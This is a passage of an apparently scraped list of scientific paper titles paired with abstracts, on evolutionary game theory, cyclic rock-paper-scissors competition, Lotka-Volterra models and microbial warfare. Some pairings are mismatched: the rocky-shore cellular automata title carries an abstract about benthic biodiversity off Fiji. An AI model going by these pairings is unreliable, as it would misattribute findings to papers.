individuals to initiate cooperation (altruism) and their tendency to mirror their partner's actions (coordination). These components of cooperation stabilize at an evolutionary equilibrium or show oscillations, depending on the chosen payoff parameters. Unlike reciprocal altruism, cooperation by coaction does not require that those willing to initiate cooperation pay in advance for uncertain future benefits. Correspondingly, we show that introducing a delay to information transfer between players is equivalent to increasing the cost of cooperation. Cooperative coaction can therefore evolve much more easily than reciprocal cooperation. When delays entirely prevent coordination, we recover results from the discrete-time alternating prisoner's dilemma, indicating that coaction and reciprocity are connected by a continuum of opportunities for real-time information exchange. --- paper_title: Nonlinear Aspects of Competition Between Three Species paper_content: It is shown that for three competitors, the classic Gause–Lotka–Volterra equations possess a special class of periodic limit cycle solutions, and a general class of solutions in which the system exhibits nonperiodic population oscillations of bounded amplitude but ever increasing cycle time. Biologically, the result is interesting as a caricature of the complexities that nonlinearities can introduce even into the simplest equations of population biology ; mathematically, the model illustrates some novel tactical tricks and dynamical peculiarities for 3-dimensional nonlinear systems. --- paper_title: Spatial Rock-Paper-Scissors Models with Inhomogeneous Reaction Rates paper_content: We study several variants of the stochastic four-state rock-paper-scissors game or, equivalently, cyclic three-species predator-prey models with conserved total particle density, by means of Monte Carlo simulations on one- and two-dimensional lattices. Specifically, we investigate the influence of spatial variability of the reaction rates and site occupancy restrictions on the transient oscillations of the species densities and on spatial correlation functions in the quasistationary coexistence state. For small systems, we also numerically determine the dependence of typical extinction times on the number of lattice sites. In stark contrast with two-species stochastic Lotka-Volterra systems, we find that for our three-species models with cyclic competition quenched disorder in the reaction rates has very little effect on the dynamics and the long-time properties of the coexistence state. Similarly, we observe that site restriction only has a minor influence on the system's dynamical properties. Our results therefore demonstrate that the features of the spatial rock-paper-scissors system are remarkably robust with respect to model variations, and stochastic fluctuations as well as spatial correlations play a comparatively minor role. --- paper_title: Evolutionary games on graphs paper_content: Game theory is one of the key paradigms behind many scientific disciplines from biology to behavioral sciences to economics. In its evolutionary form and especially when the interacting agents are linked in a specific social network the underlying solution concepts and methods are very similar to those applied in non-equilibrium statistical physics. This review gives a tutorial-type overview of the field for physicists. The first three sections introduce the necessary background in classical and evolutionary game theory from the basic definitions to the most important results. The fourth section surveys the topological complications implied by non-mean-field-type social network structures in general. The last three sections discuss in detail the dynamic behavior of three prominent classes of models: the Prisoner's Dilemma, the Rock-Scissors-Paper game, and Competing Associations. The major theme of the review is in what sense and how the graph structure of interactions can modify and enrich the picture of long term behavioral patterns emerging in evolutionary games. --- paper_title: Interaction strengths in food webs : issues and opportunities paper_content: Summary 1. Recent efforts to understand how the patterning of interaction strength affects both structure and dynamics in food webs have highlighted several obstacles to productive synthesis. Issues arise with respect to goals and driving questions, methods and approaches, and placing results in the context of broader ecological theory. 2. Much confusion stems from lack of clarity about whether the questions posed relate to community-level patterns or to species dynamics, and to what authors actually mean by the term ‘interaction strength’. Here, we describe the various ways in which this term has been applied and discuss the implications of loose terminology and definition for the development of this field. 3. Of particular concern is the clear gap between theoretical and empirical investigations of interaction strengths and food web dynamics. The ecological community urgently needs to explore new ways to estimate biologically reasonable model coefficients from empirical data, such as foraging rates, body size, metabolic rate, biomass distribution and other species traits. 4. Combining numerical and analytical modelling approaches should allow exploration of the conditions under which different interaction strengths metrics are interchangeable with regard to relative magnitude, system responses, and species identity. 5. Finally, the prime focus on predator‐prey links in much of the research to date on interaction strengths in food webs has meant that the potential significance of nontrophic interactions, such as competition, facilitation and biotic disturbance, has been largely ignored by the food web community. Such interactions may be important dynamically and should be routinely included in future food web research programmes. --- paper_title: Handbook of Stochastic Methods: For Physics, Chemistry and the Natural Sciences paper_content: The Handbook of Stochastic Methods covers systematically and in simple language the foundations of Markov systems, stochastic differential equations, Fokker-Planck equations, approximation methods, chemical master equations, and quatum-mechanical Markov processes. Strong emphasis is placed on systematic approximation methods for solving problems. Stochastic adiabatic elimination is newly formulated. The book contains the "folklore" of stochastic methods in systematic form and is suitable for use as a reference work. --- paper_title: Meet the New Boss – Same as the Old Boss paper_content: A key paradox of subalternity for the subject throwing off the colonial yoke is the degree to which the collective emergence from the nation-state is to be in the image of the colonizer; that is, as a modern state, notionally on a par with the mother/father country. With a view to understanding the meaning of such symbolic investments, this paper surveys the lyrics of national anthems from a wide range of postcolonial countries. ::: ::: Despite the avowals one regularly finds in the lyrics of postcolonial anthems, and despite the expression of sometimes rote resistance to a putative colonial oppressor, those singing songs which imitate European anthems, and the feeling such anthems inspire, invest identity in the mimetic, rather than the unique. On the basis of a range of observations of anthems and their circumstances, this paper dares to ask finally whether the singing of anthems makes for better worlds. --- paper_title: Oscillatory Dynamics in Rock-Paper-Scissors Games with Mutations paper_content: We study the oscillatory dynamics in the generic three-species rock-paper-scissors games with mutations. In the mean-field limit, different behaviors are found: (a) for high mutation rate, there is a stable interior fixed point with coexistence of all species; (b) for low mutation rates, there is a region of the parameter space characterized by a limit cycle resulting from a Hopf bifurcation; (c) in the absence of mutations, there is a region where heteroclinic cycles yield oscillations of large amplitude (not robust against noise). After a discussion on the main properties of the mean-field dynamics, we investigate the stochastic version of the model within an individual-based formulation. Demographic fluctuations are therefore naturally accounted and their effects are studied using a diffusion theory complemented by numerical simulations. It is thus shown that persistent erratic oscillations (quasi-cycles) of large amplitude emerge from a noise-induced resonance phenomenon. We also analytically and numerically compute the average escape time necessary to reach a (quasi-)cycle on which the system oscillates at a given amplitude. --- paper_title: Evolutionary games on minimally structured populations paper_content: Population structure induced by both spatial embedding and more general networks of interaction, such as model social networks, have been shown to have a fundamental effect on the dynamics and outcome of evolutionary games. These effects have, however, proved to be sensitive to the details of the underlying topology and dynamics. Here we introduce a minimal population structure that is described by two distinct hierarchical levels of interaction, similar to the structured metapopulation concept of ecology and island models in population genetics. We believe this model is able to identify effects of spatial structure that do not depend on the details of the topology. While effects depending on such details clearly lie outside the scope of our approach, we expect that those we are able to reproduce should be generally applicable to a wide range of models. We derive the dynamics governing the evolution of a system starting from fundamental individual level stochastic processes through two successive mean-field approximations. In our model of population structure the topology of interactions is described by only two parameters: the effective population size at the local scale and the relative strength of local dynamics to global mixing. We demonstrate, for example, the existence of a continuous transition leading to the dominance of cooperation in populations with hierarchical levels of unstructured mixing as the benefit to cost ratio becomes smaller then the local population size. Applying our model of spatial structure to the repeated prisoner's dilemma we uncover a counterintuitive mechanism by which the constant influx of defectors sustains cooperation. Further exploring the phase space of the repeated prisoner's dilemma and also of the ``rock-paper-scissor'' game we find indications of rich structure and are able to reproduce several effects observed in other models with explicit spatial embedding, such as the maintenance of biodiversity and the emergence of global oscillations. --- paper_title: Imitation, internal absorption and the reversal of local drift in stochastic evolutionary games paper_content: Evolutionary game dynamics in finite populations is typically subject to noise, inducing effects which are not present in deterministic systems, including fixation and extinction. In the first part of this paper we investigate the phenomenon of drift reversal in finite populations, taking into account that drift is a local quantity in strategy space. Secondly, we study a simple imitation dynamics, and show that it can lead to fixation at internal mixed-strategy fixed points even in finite populations. Imitation in infinite populations is adequately described by conventional replicator dynamics, and these equations are known to have internal fixed points. Internal absorption in finite populations on the other hand is a novel dynamic phenomenon. Due to an outward drift in finite populations this type of dynamic arrest is not found in other commonly studied microscopic dynamics, not even in those with the same deterministic replicator limit as imitation. --- paper_title: Noise-guided evolution within cyclical interactions paper_content: We study a stochastic predator–prey model on a square lattice, where each of the six species has two superior and two inferior partners. The invasion probabilities between species depend on the predator–prey pair and are supplemented by Gaussian noise. Conditions are identified that warrant the largest impact of noise on the evolutionary process, and the results of Monte Carlo simulations are qualitatively reproduced by a four-point cluster dynamical mean-field approximation. The observed noise-guided evolution is deeply routed in short-range spatial correlations, which is supported by simulations on other host lattice topologies. Our findings are conceptually related to the coherence resonance phenomenon in dynamical systems via the mechanism of threshold duality. We also show that the introduced concept of noise-guided evolution via the exploitation of threshold duality is not limited to predator–prey cyclical interactions, but may apply to models of evolutionary game theory as well, thus indicating its applicability in several different fields of research. --- paper_title: Extinction in neutrally stable stochastic Lotka-Volterra models paper_content: Populations of competing biological species exhibit a fascinating interplay between the nonlinear dynamics of evolutionary selection forces and random fluctuations arising from the stochastic nature of the interactions. The processes leading to extinction of species, whose understanding is a key component in the study of evolution and biodiversity, are influenced by both of these factors. Here, we investigate a class of stochastic population dynamics models based on generalized Lotka-Volterra systems. In the case of neutral stability of the underlying deterministic model, the impact of intrinsic noise on the survival of species is dramatic: It destroys coexistence of interacting species on a time scale proportional to the population size. We introduce a new method based on stochastic averaging which allows one to understand this extinction process quantitatively by reduction to a lower-dimensional effective dynamics. This is performed analytically for two highly symmetrical models and can be generalized numerically to more complex situations. The extinction probability distributions and other quantities of interest we obtain show excellent agreement with simulations. --- paper_title: Replicator dynamics of reward & reputation in public goods games. paper_content: Public goods games have become the mathematical metaphor for game theoretical investigations of cooperative behavior in groups of interacting individuals. Cooperation is a conundrum because cooperators make a sacrifice to benefit others at some cost to themselves. Exploiters or defectors reap the benefits and forgo costs. Despite the fact that groups of cooperators outperform groups of defectors, Darwinian selection or utilitarian principles based on rational choice should favor defectors. In order to overcome this social dilemma, much effort has been expended for investigations pertaining to punishment and sanctioning measures against defectors. Interestingly, the complementary approach to create positive incentives and to reward cooperation has received considerably less attention-despite being heavily advocated in education and social sciences for increasing productivity or preventing conflicts. Here we show that rewards can indeed stimulate cooperation in interaction groups of arbitrary size but, in contrast to punishment, fail to stabilize it. In both cases, however, reputation is essential. The combination of reward and reputation result in complex dynamics dominated by unpredictable oscillations. --- paper_title: Spatial aspects of interspecific competition. paper_content: Using several variants of a stochastic spatial model introduced by Silvertown et al., we investigate the effect of spatial distribution of individuals on the outcome of competition. First, we prove rigorously that if one species has a competitive advantage over each of the others, then eventually it takes over all the sites in the system. Second, we examine tradeoffs between competition and dispersal distance in a two-species system. Third, we consider a cyclic competitive relationship between three types. In this case, a nonspatial treatment leads to densities that follow neutrally stable cycles or even unstable spiral solutions, while a spatial model yields a stationary distribution with an interesting spatial structure. --- paper_title: Alleopathy and spatial competition among coral reef invertebrates. paper_content: Species of ectoprocts and solitary encrusting animals were subjected in aquaria to homogenates of 11 sympatric species of sponges and colonial ascidians. Five of the nine sponge species and one of the two ascidian species exhibited species-specific allelochemical effects. Evidence suggests that alleochemical provide a wide-spread, specific, and complex mechanism for interference competition for space among natural populations of coral reef organisms. The existence of such species-specific mechanisms may provide a basis for maintenance of diversity in space-limited systems in the absence of high levels of predation and physical disturbance. --- paper_title: Social learning promotes institutions for governing the commons paper_content: Cooperation in evolutionary games can be stabilized through punishment of non-cooperators, at a cost to those who do the punishing. Punishment can take different forms, in particular peer-punishment, in which individuals punish free-riders after the event, and pool-punishment, in which a fund for sanctioning is set up beforehand. These authors show that pool-punishment is superior to peer-punishment in dealing with second-order free-riders, who cooperate in the main game but refuse to contribute to punishment. --- paper_title: Modelling patch dynamics on rocky shores using deterministic cellular automata paper_content: Information on biodiversity and community structure is vital for monitoring the effects of climate change and other anthropogenic impacts. Benthic ecosystems of 5 sites off Viti Levu (Fiji),comprising 50 stations were sampled quantitatively revealing 13 128 individuals of 230 species at a mean density of 273.5 ind. m–2. Common taxa included polychaetes (89 species), crustaceans (84 species), molluscs (50 species) and echinoderms (7 species). No species occurred in all 50 stations; the maximum distribution range was 45 stations occupied by the polychaete Aglaophamus sp. A total of 81 species (35.2%) were restricted to single sites (‘uniques’), highlighting spot endemism. Species richness and rarefaction curves provided high estimates of diversity. Multivariate analyses incorporating biological abundances and environmental factors showed 3 distinct clusters among sites characterising differences in benthic community structure. Strongest determinants of faunal distribution were depth, distance from reef and river, and sand content. The presence of heterogeneous faunal assemblages suggests the interplay of these factors at each site. Fauna in Nadi Bay (Shannon-Weiner diversity index H’: 3.26), Suva Harbour (H’: 3.19) and Laucala Bay Lagoon (H’: 3.06) had high diversity indicative of biologically accommodated communities. Rewa River Estuary (H’: 2.42) and Nukubuco Reef drop-off (H’: 2.48) had low diversities, typical of habitats subjected to fluctuating environmental conditions. Benthic community structure in the lagoons around Viti Levu was rich and diverse. Biodiversity was greater than previously recorded from the Great Astrolabe Reef, Fiji (207 ::: to 211 species) and Australia’s Great Barrier Reef (154 species), but lower than in New Caledonia (311 species) and Tahiti (315 species). --- paper_title: Mutual Feedbacks Maintain Both Genetic and Species Diversity in a Plant Community paper_content: The forces that maintain genetic diversity among individuals and diversity among species are usually studied separately. Nevertheless, diversity at one of these levels may depend on the diversity at the other. We have combined observations of natural populations, quantitative genetics, and field experiments to show that genetic variation in the concentration of an allelopathic secondary compound in Brassica nigra is necessary for the coexistence of B. nigra and its competitor species. In addition, the diversity of competing species was required for the maintenance of genetic variation in the trait within B. nigra. Thus, conservation of species diversity may also necessitate maintenance of the processes that sustain the genetic diversity of each individual species. --- paper_title: Local migration promotes competitive restraint in a host–pathogen 'tragedy of the commons' paper_content: These T4 page and their E. coli hosts are the model for a typical 'victim-exploiter' interaction in a study of the role of migration patterns in a 'tragedy of the commons' competition for limited resources within fragmented communities. In this host-pathogen system, growing in 96-well microtitre plates, coexistence, stability and evolution within the separated communities depend critically on migration: restricted migration can promote restraint in the use of the common resource. In this experiment and in theory, highly connected social networks favour virulence. Fragmented populations possess an intriguing duplicity: even if subpopulations are reliably extinction-prone, asynchrony in local extinctions and recolonizations makes global persistence possible1,2,3,4,5,6,7,8. Migration is a double-edged sword in such cases: too little migration prevents recolonization of extinct patches, whereas too much synchronizes subpopulations, raising the likelihood of global extinction. Both edges of this proverbial sword have been explored by manipulating the rate of migration within experimental populations1,3,4,5,6,8. However, few experiments have examined how the evolutionary ecology of fragmented populations depends on the pattern of migration5. Here, we show that the migration pattern affects both coexistence and evolution within a community of bacterial hosts (Escherichia coli) and viral pathogens (T4 coliphage) distributed across a large network of subpopulations. In particular, different patterns of migration select for distinct pathogen strategies, which we term 'rapacious' and 'prudent'. These strategies define a 'tragedy of the commons'9: rapacious phage displace prudent variants for shared host resources, but prudent phage are more productive when alone. We find that prudent phage dominate when migration is spatially restricted, while rapacious phage evolve under unrestricted migration. Thus, migration pattern alone can determine whether a de novo tragedy of the commons is resolved in favour of restraint. --- paper_title: Evolution and the Theory of Games paper_content: In the Hamadryas baboon, males are substantially larger than females. A troop of baboons is subdivided into a number of ‘one-male groups’, consisting of one adult male and one or more females with their young. The male prevents any of ‘his’ females from moving too far from him. Kummer (1971) performed the following experiment. Two males, A and B, previously unknown to each other, were placed in a large enclosure. Male A was free to move about the enclosure, but male B was shut in a small cage, from which he could observe A but not interfere. A female, unknown to both males, was then placed in the enclosure. Within 20 minutes male A had persuaded the female to accept his ownership. Male B was then released into the open enclosure. Instead of challenging male A , B avoided any contact, accepting A’s ownership. --- paper_title: Evolution of restraint in a structured rock-paper-scissors community. paper_content: It is not immediately clear how costly behavior that benefits others evolves by natural selection. By saving on inherent costs, individuals that do not contribute socially have a selective advantage over altruists if both types receive equal benefits. Restrained consumption of a common resource is a form of altruism. The cost of this kind of prudent behavior is that restrained individuals give up resources to less-restrained individuals. The benefit of restraint is that better resource management may prolong the persistence of the group. One way to dodge the problem of defection is for altruists to interact disproportionately with other altruists. With limited dispersal, restrained individuals persist because of interaction with like types, whereas it is the unrestrained individuals that must face the negative long-term consequences of their rapacity. Here, we study the evolution of restraint in a community of three competitors exhibiting a nontransitive (rock–paper–scissors) relationship. The nontransitivity ensures a form of negative feedback, whereby improvement in growth of one competitor has the counterintuitive consequence of lowering the density of that improved player. This negative feedback generates detrimental long-term consequences for unrestrained growth. Using both computer simulations and evolution experiments with a nontransitive community of Escherichia coli, we find that restrained growth can evolve under conditions of limited dispersal in which negative feedback is present. This research, thus, highlights a set of ecological conditions sufficient for the evolution of one form of altruism. --- paper_title: Competing associations in bacterial warfare with two toxins paper_content: Simple combinations of common competitive mechanisms can easily result in cyclic competitive dominance relationships between species. The topological features of such competitive networks allow for complex spatial coexistence patterns. We investigate self-organization and coexistence in a lattice model, describing the spatial population dynamics of competing bacterial strains. With increasing diffusion rate the community of the nine possible toxicity/resistance types undergoes two phase transitions. Below a critical level of diffusion, the system exhibits expanding domains of three different defensive alliances, each consisting of three cyclically dominant species. Due to the neutral relationship between these alliances and the finite system size effect, ultimately only one of them remains. At large diffusion rates the system admits three coexisting domains, each containing mutually neutral species. Because of the cyclical dominance between these domains, a long term stable coexistence of all species is ensured. In the third phase at intermediate diffusion the spatial structure becomes even more complicated with domains of mutually neutral species persisting along the borders of defensive alliances. The study reveals that cyclic competitive relationships may produce a large variety of complex coexistence patterns, exhibiting common features of natural ecosystems, like hierarchical organization, phase transitions and sudden, large-scale fluctuations. --- paper_title: Phase transitions induced by variation of invasion rates in spatial cyclic predator-prey models with four or six species paper_content: Cyclic predator-prey models with four or six species are studied on a square lattice when the invasion rates are varied. It is found that the cyclic invasions maintain a self-organizing pattern as long as the deviation of the invasion rate(s) from a uniform value does not exceed a threshold value. For larger deviations the system exhibits a continuous phase transition into a frozen distribution of odd (or even) label species. --- paper_title: Chemical warfare between microbes promotes biodiversity paper_content: Evolutionary processes generating biodiversity and ecological mechanisms maintaining biodiversity seem to be diverse themselves. Conventional explanations of biodiversity such as niche differentiation, density-dependent predation pressure, or habitat heterogeneity seem satisfactory to explain diversity in communities of macrobial organisms such as higher plants and animals. For a long time the often high diversity among microscopic organisms in seemingly uniform environments, the famous “paradox of the plankton,” has been difficult to understand. The biodiversity in bacterial communities has been shown to be sometimes orders of magnitudes higher than the diversity of known macrobial systems. Based on a spatially explicit game theoretical model with multiply cyclic dominance structures, we suggest that antibiotic interactions within microbial communities may be very effective in maintaining diversity. --- paper_title: Stability and robustness analysis of cooperation cycles driven by destructive agents in finite populations paper_content: The emergence and promotion of cooperation are two of the main issues in evolutionary game theory, as cooperation is amenable to exploitation by defectors, which take advantage of cooperative individuals at no cost, dooming them to extinction. It has been recently shown that the existence of purely destructive agents (termed jokers) acting on the common enterprises (public goods games) can induce stable limit cycles among cooperation, defection, and destruction when infinite populations are considered. These cycles allow for time lapses in which cooperators represent a relevant fraction of the population, providing a mechanism for the emergence of cooperative states in nature and human societies. Here we study analytically and through agent-based simulations the dynamics generated by jokers in finite populations for several selection rules. Cycles appear in all cases studied, thus showing that the joker dynamics generically yields a robust cyclic behavior not restricted to infinite populations. We also compute the average time in which the population consists mostly of just one strategy and compare the results with numerical simulations. --- paper_title: Evolutionary classification of toxin mediated interactions in microorganisms paper_content: A trade-off between the parameters of Lotka-Volterra systems is used to give verifications of relations between intrinsic growth rate and limiting capacity and the stability type of the resulting dynamical system. The well known rock-paper-scissors game serves as a template for toxin mediated interactions, which is best represented by the bacteriocin producing Escherichia coli bacteria. There, we have three strains of the same species. The producer produces a toxin lethal to the sensitive, while the resistant is able to protect itself from that toxin. Due to the fact that there are costs for production and for resistance, a dynamics similar to the rock-paper-scissors game results. By using an adaptive dynamics approach for competitive Lotka-Volterra systems and assuming an inverse relation (trade-off) between intrinsic growth rate (IGR) and limiting capacity (LC) we obtain evolutionary and convergence stable relations between the IGR's and the LC's. Furthermore this evolutionary process leads to a phase topology of the population dynamics with a globally stable interior fixed point by leaving the interaction parameters constant. While the inverse trade-off stabilizes coexistence and does not allow branching, toxicity itself can promote diversification. The results are discussed in view of several biological examples indicating that the above results are structurally valid. --- paper_title: Chemical warfare and survival strategies in bacterial range expansions paper_content: Dispersal of species is a fundamental ecological process in the evolution and maintenance of biodiversity. Limited control over ecological parameters has hindered progress in understanding of what enables species to colonize new areas, as well as the importance of interspecies interactions. Such control is necessary to construct reliable mathematical models of ecosystems. In our work, we studied dispersal in the context of bacterial range expansions and identified the major determinants of species coexistence for a bacterial model system of three Escherichia coli strains (toxin-producing, sensitive and resistant). Genetic engineering allowed us to tune strain growth rates and to design different ecological scenarios (cyclic and hierarchical). We found that coexistence of all strains depended on three strongly interdependent factors: composition of inoculum, relative strain growth rates and effective toxin range. Robust agreement between our experiments and a thoroughly calibrated computational model enabled us to extrapolate these intricate interdependencies in terms of phenomenological biodiversity laws. Our mathematical analysis also suggested that cyclic dominance between strains is not a prerequisite for coexistence in competitive range expansions. Instead, robust three-strain coexistence required a balance between growth rates and either a reduced initial ratio of the toxin-producing strain, or a sufficiently short toxin range. --- paper_title: Evolutionary Games and Population Dynamics paper_content: Every form of behavior is shaped by trial and error. Such stepwise adaptation can occur through individual learning or through natural selection, the basis of evolution. Since the work of Maynard Smith and others, it has been realized how game theory can model this process. Evolutionary game theory replaces the static solutions of classical game theory by a dynamical approach centered not on the concept of rational players but on the population dynamics of behavioral programs. In this book the authors investigate the nonlinear dynamics of the self-regulation of social and economic behavior, and of the closely related interactions among species in ecological communities. Replicator equations describe how successful strategies spread and thereby create new conditions that can alter the basis of their success, i.e., to enable us to understand the strategic and genetic foundations of the endless chronicle of invasions and extinctions that punctuate evolution. In short, evolutionary game theory describes when to escalate a conflict, how to elicit cooperation, why to expect a balance of the sexes, and how to understand natural selection in mathematical terms. ::: ::: Comprehensive treatment of ecological and game theoretic dynamics ::: Invasion dynamics and permanence as key concepts ::: Explanation in terms of games of things like competition between species --- paper_title: Coevolutionary games - a mini review paper_content: Prevalence of cooperation within groups of selfish individuals is puzzling in that it contradicts with the basic premise of natural selection. Favoring players with higher fitness, the latter is key for understanding the challenges faced by cooperators when competing with defectors. Evolutionary game theory provides a competent theoretical framework for addressing the subtleties of cooperation in such situations, which are known as social dilemmas. Recent advances point towards the fact that the evolution of strategies alone may be insufficient to fully exploit the benefits offered by cooperative behavior. Indeed, while spatial structure and heterogeneity, for example, have been recognized as potent promoters of cooperation, coevolutionary rules can extend the potentials of such entities further, and even more importantly, lead to the understanding of their emergence. The introduction of coevolutionary rules to evolutionary games implies, that besides the evolution of strategies, another property may simultaneously be subject to evolution as well. Coevolutionary rules may affect the interaction network, the reproduction capability of players, their reputation, mobility or age. Here we review recent works on evolutionary games incorporating coevolutionary rules, as well as give a didactic description of potential pitfalls and misconceptions associated with the subject. In addition, we briefly outline directions for future research that we feel are promising, thereby particularly focusing on dynamical effects of coevolutionary rules on the evolution of cooperation, which are still widely open to research and thus hold promise of exciting new discoveries. --- paper_title: A three-species model explaining cyclic dominance of pacific salmon paper_content: The four-year oscillations of the number of spawning sockeye salmon (Oncorhynchus nerka) that return to their native stream within the Fraser River basin in Canada are a striking example of population oscillations. The period of the oscillation corresponds to the dominant generation time of these fish. Various - not fully convincing - explanations for these oscillations have been proposed, including stochastic influences, depensatory fishing, or genetic effects. Here, we show that the oscillations can be explained as a stable dynamical attractor of the population dynamics, resulting from a strong resonance near a Neimark Sacker bifurcation. This explains not only the long-term persistence of these oscillations, but also reproduces correctly the empirical sequence of salmon abundance within one period of the oscillations. Furthermore, it explains the observation that these oscillations occur only in sockeye stocks originating from large oligotrophic lakes, and that they are usually not observed in salmon species that have a longer generation time. --- paper_title: Evolutionary Game Theory: Theoretical Concepts and Applications to Microbial Communities paper_content: Ecological systems are complex assemblies of large numbers of individuals, interacting competitively under multifaceted environmental conditions. Recent studies using microbial laboratory communities have revealed some of the self-organization principles underneath the complexity of these systems. A major role of the inherent stochasticity of its dynamics and the spatial segregation of different interacting species into distinct patterns has thereby been established. It ensures the viability of microbial colonies by allowing for species diversity, cooperative behavior and other kinds of “social” behavior. ::: ::: A synthesis of evolutionary game theory, nonlinear dynamics, and the theory of stochastic processes provides the mathematical tools and a conceptual framework for a deeper understanding of these ecological systems. We give an introduction into the modern formulation of these theories and illustrate their effectiveness focussing on selected examples of microbial systems. Intrinsic fluctuations, stemming from the discreteness of individuals, are ubiquitous, and can have an important impact on the stability of ecosystems. In the absence of speciation, extinction of species is unavoidable. It may, however, take very long times. We provide a general concept for defining survival and extinction on ecological time-scales. Spatial degrees of freedom come with a certain mobility of individuals. When the latter is sufficiently high, bacterial community structures can be understood through mapping individual-based models, in a continuum approach, onto stochastic partial differential equations. These allow progress using methods of nonlinear dynamics such as bifurcation analysis and invariant manifolds. We conclude with a perspective on the current challenges in quantifying bacterial pattern formation, and how this might have an impact on fundamental research in non-equilibrium physics. --- paper_title: Labyrinthine clustering in a spatial rock-paper-scissors ecosystem paper_content: The spatial rock-paper-scissors ecosystem, where three species interact cyclically, is a model example of how spatial structure can maintain biodiversity. We here consider such a system for a broad range of interaction rates. When one species grows very slowly, this species and its prey dominate the system by self-organizing into a labyrinthine configuration in which the third species propagates. The cluster size distributions of the two dominating species have heavy tails and the configuration is stabilized through a complex spatial feedback loop. We introduce a statistical measure that quantifies the amount of clustering in the spatial system by comparison with its mean-field approximation. Hereby, we are able to quantitatively explain how the labyrinthine configuration slows down the dynamics and stabilizes the system. --- paper_title: Mobility promotes and jeopardizes biodiversity in rock-paper-scissors games paper_content: Biodiversity is essential to the viability of ecological systems. Species diversity in ecosystems is promoted by cyclic, non-hierarchical interactions among competing populations. Such non-transitive relations lead to an evolution with central features represented by the `rock-paper-scissors' game, where rock crushes scissors, scissors cut paper, and paper wraps rock. In combination with spatial dispersal of static populations, this type of competition results in the stable coexistence of all species and the long-term maintenance of biodiversity. However, population mobility is a central feature of real ecosystems: animals migrate, bacteria run and tumble. Here, we observe a critical influence of mobility on species diversity. When mobility exceeds a certain value, biodiversity is jeopardized and lost. In contrast, below this critical threshold all subpopulations coexist and an entanglement of travelling spiral waves forms in the course of temporal evolution. We establish that this phenomenon is robust, it does not depend on the details of cyclic competition or spatial environment. These findings have important implications for maintenance and evolution of ecological systems and are relevant for the formation and propagation of patterns in excitable media, such as chemical kinetics or epidemic outbreaks. --- paper_title: Three- and four-state rock-paper-scissors games with diffusion paper_content: Cyclic dominance of three species is a commonly occurring interaction dynamics, often denoted the rock-paper-scissors (RPS) game. Such a type of interactions is known to promote species coexistence. Here, we generalize recent results of Reichenbach [Nature (London) 448, 1046 (2007)] of a four-state variant of the RPS game. We show that spiral formation takes place only without a conservation law for the total density. Nevertheless, in general, fast diffusion can destroy species coexistence. We also generalize the four-state model to slightly varying reaction rates. This is shown both analytically and numerically not to change pattern formation, or the effective wavelength of the spirals, and therefore not to alter the qualitative properties of the crossover to extinction. --- paper_title: When does cyclic dominance lead to stable spiral waves? paper_content: Species diversity in ecosystems is often accompanied by the self-organisation of the population into fascinating spatio-temporal patterns. Here, we consider a two-dimensional three-species population model and study the spiralling patterns arising from the combined effects of generic cyclic dominance, mutation, pair-exchange and hopping of the individuals. The dynamics is characterised by nonlinear mobility and a Hopf bifurcation around which the system's phase diagram is inferred from the underlying complex Ginzburg-Landau equation derived using a perturbative multiscale expansion. While the dynamics is generally characterised by spiralling patterns, we show that spiral waves are stable in only one of the four phases. Furthermore, we characterise a phase where nonlinearity leads to the annihilation of spirals and to the spatially uniform dominance of each species in turn. Away from the Hopf bifurcation, when the coexistence fixed point is unstable, the spiralling patterns are also affected by nonlinear diffusion. --- paper_title: Co-existence in the two-dimensional May-Leonard model with random rates paper_content: We employ Monte Carlo simulations to numerically study the temporal evolution and transient oscillations of the population densities, the associated frequency power spectra, and the spatial correlation functions in the (quasi-) steady state in two-dimensional stochastic May-Leonard models of mobile individuals, allowing for particle exchanges with nearest-neighbors and hopping onto empty sites. We therefore consider a class of four-state three-species cyclic predator-prey models whose total particle number is not conserved. We demonstrate that quenched disorder in either the reaction or in the mobility rates hardly impacts the dynamical evolution, the emergence and structure of spiral patterns, or the mean extinction time in this system. We also show that direct particle pair exchange processes promote the formation of regular spiral structures. Moreover, upon increasing the rates of mobility, we observe a remarkable change in the extinction properties in the May-Leonard system (for small system sizes): (1) as the mobility rate exceeds a threshold that separates a species coexistence (quasi-) steady state from an absorbing state, the mean extinction time as function of system size N crosses over from a functional form ∼ e cN /N (where c is a constant) to a linear dependence; (2) the measured histogram of extinction times displays a corresponding crossover from an (approximately) exponential to a Gaussian distribution. The latter results are found to hold true also when the mobility rates are randomly distributed. --- paper_title: Spontaneous formation of dynamical patterns with fractal fronts in the cyclic lattice Lotka-Volterra model. paper_content: Dynamical patterns, in the form of consecutive moving stripes or rings, are shown to develop spontaneously in the cyclic lattice Lotka-Volterra model, when realized on square lattice, at the reaction limited regime. Each stripe consists of different particles (species) and the borderlines between consecutive stripes are fractal. The interface width w between the different species scales as w(L,t) approximately L(alpha)f(t/L(z)), where L is the linear size of the interface, t is the time, and alpha and z are the static and dynamical critical exponents, respectively. The critical exponents were computed as alpha=0.49+/-0.03 and z=1.53+/-0.13 and the propagating fronts show dynamical characteristics similar to those of the Eden growth models. --- paper_title: Instability of spatial patterns and its ambiguous impact on species diversity paper_content: Self-arrangement of individuals into spatial patterns often accompanies and promotes species diversity in ecological systems. Here, we investigate pattern formation arising from cyclic dominance of three species, operating near a bifurcation point. In its vicinity, an Eckhaus instability occurs, leading to convectively unstable "blurred" patterns. At the bifurcation point, stochastic effects dominate and induce counterintuitive effects on diversity: Large patterns, emerging for medium values of individuals' mobility, lead to rapid species extinction, while small patterns (low mobility) promote diversity, and high mobilities render spatial structures irrelevant. We provide a quantitative analysis of these phenomena, employing a complex Ginzburg-Landau equation. --- paper_title: Rock-scissors-paper game in a chaotic flow: the effect of dispersion on the cyclic competition of microorganisms. paper_content: Laboratory experiments and numerical simulations have shown that the outcome of cyclic competition is significantly affected by the spatial distribution of the competitors. Short-range interaction and limited dispersion allows for coexistence of competing species that cannot coexist in a well-mixed environment. In order to elucidate the mechanisms that destroy species diversity we study the intermediate situation of imperfect mixing, typical in aquatic media, in a model of cyclic competition between toxin producing, sensitive and resistant phenotypes. It is found, that chaotic mixing, by changing the character of the spatial distribution, induces coherent oscillations in the populations. The magnitude of the oscillations increases with the strength of mixing, leading to the extinction of some species beyond a critical mixing rate. When mixing is non-uniform in space, coexistence can be sustained at much stronger mixing by the formation of partially isolated regions, that prevent global extinction. The heterogeneity of mixing may enable toxin producing and sensitive strains to coexist for very long time at strong mixing. --- paper_title: Coexistence versus extinction in the stochastic cyclic Lotka-Volterra model paper_content: Cyclic dominance of species has been identified as a potential mechanism to maintain biodiversity, see, e.g., B. Kerr, M. A. Riley, 